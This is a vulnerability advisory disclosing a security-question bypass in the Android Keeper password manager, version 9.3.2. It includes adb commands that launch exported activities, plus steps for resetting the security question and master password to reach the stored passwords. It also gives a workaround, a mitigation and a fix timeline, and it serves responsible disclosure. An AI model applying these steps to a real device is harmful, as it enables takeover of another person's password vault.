SIK-2016-025


Title:

Keeper Password Manager Security Question Bypass

Report ID

SIK-2016-025

Summary:

  • Vendor: Keeper Security, Inc.
  • Product: Keeper® Passwort-Manager
  • Affected Version: Version: 9.3.2-229, platformBuildVersionName=6.0-2166767
  • Severity: medium
  • Short summary: By starting an exported activity in a specific state of the app the Keeper Passwort Manager can be used to reset the security question without further authentication. If the mail account is also set up on the phone and accessible to the adversary he can reset the master password to gain access to the stored passwords.

Details:

If the user is logged out, the master password has to be entered to access the passwords in the app. An adversary with local access to the device can now attempt to reset the master password. For this attack scenario it is also assumed that, by having local access to the device the adversary has also access to the mail account which is connected to the keeper account.

By entering the password incorrectly once the adversary can select “Forgot Password” after which a verification code has to be entered.
In this state the Keeper app with minSdkVersion=15, the adversary can launch the activity com.callpod.android_apps.keeper.DeepLinkActivity by using the shell based Activitymanager am:

adb shell am start -n com.callpod.android_apps.keeper/.DeepLinkActivity

In the Keeper app with minSdkVersion=19 he calls the activity by:

adb shell am start -n com.callpod.android_apps.keeper/.ParseDeepLinkActivity -a android.intent.action.VIEW -d "https://kepr.co"

The app then fails to show the login activity but shows an empty password list with a different background. In this state, it is still possible to view the menu on the left, to access the “Settings” menu. In this menu the adversary resets the security question without any knowledge of the master password or previous security questions.

The app then has to be forcefully restarted in the application manager. After that, the adversary reenters the “forgot password” view. He accesses the email app of the user to get the verification code and enters it in the Keeper Passwort App. The app then prompts the security question. The adversary can answer this question because he previously defined the question and the answer. Then he can change the master password. With this he can access and view all the stored passwords.

Workaround

Secure your local mail app with e.g. a password. It is then not possible to get the mail with the verification code.

Suggested Mitigation

One possibility to fix the problem could be, starting the com.callpod.android_apps.keeper.DeepLinkActivity activity should always result in prompting the user for the master password when he is logged out.

Timeline

  • 2016-05-25 Vulnerability Discovered
  • 2016-05-25 Vulnerability Reported
  • 2016-10-06 Vulnerability Fixed